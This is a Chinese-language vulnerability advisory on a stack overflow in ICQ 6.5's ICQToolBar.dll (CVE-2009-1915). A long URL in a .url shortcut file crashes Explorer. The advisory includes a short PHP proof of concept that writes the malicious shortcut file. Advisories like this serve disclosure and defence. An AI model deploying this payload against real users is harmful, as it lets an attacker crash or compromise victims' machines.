ICQ ICQToolBar.dll库栈溢出漏洞

受影响系统:

AOL ICQ 6.5

描述:


BUGTRAQ  ID: 35150
CVE(CAN) ID: CVE-2009-1915

ICQ是一款流行的即时通讯聊天工具。

ICQ的URL搜索钩子(ICQToolBar.dll)中存在栈溢出漏洞。如果用户受骗跟随了包含有超长URL参数的Internet快捷方式.URL文件的话,就可以触发这个溢出,导致资源管理器崩溃。

<*来源:pyrokinesis (pyro@nospam.it
  
  链接:http://www.milw0rm.com/exploits/8832
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
/*

$____x = "[InternetShortcut]\x0d\x0a".
         "URL=".str_repeat("\x61",2184);
file_put_contents("9sg_poc.url",$____x);
?>

建议:


厂商补丁:

AOL

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.icq.com/

发表评论?

0 条评论。

发表评论